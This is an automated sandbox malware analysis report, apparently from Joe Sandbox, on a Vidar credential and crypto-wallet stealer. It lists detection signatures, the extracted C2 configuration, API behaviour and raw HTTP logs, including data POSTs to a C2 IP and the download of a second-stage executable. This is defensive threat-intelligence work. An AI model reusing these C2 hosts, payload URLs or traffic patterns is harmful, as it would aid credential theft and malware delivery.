Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1524654
MD5:	d5251bd2a4d9ee464b1dbb25245a67a7
SHA1:	a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
SHA256:	5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
Tags:	exeuser-Bitsight
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has nameless sections

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Found malware configuration

Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 30%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\msvcp110.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_02A080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A08048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_02A08048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A11E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	3_2_02A11E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0A7D8 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,	3_2_02A0A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6CA76C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D38ED FindFirstFileExW,	0_2_6D5D38ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A15FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_02A0BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_02A14CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_02A1543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A01D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_02A0B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A09D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_02A15B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_02A0CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_02A15142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		3_2_02A014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		3_2_02A014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49714 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.9:49715
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.9:49716

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199780418869

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 49.12.197.9 49.12.197.9
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49715 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49718 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49713 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49714 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49717 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49716 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49721 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49722 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49719 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49720 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49723 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49724 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49725 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49727 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49726 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49731 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49732 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49733 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49734 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49729 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49730 -> 49.12.197.9:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6897Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 131345Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
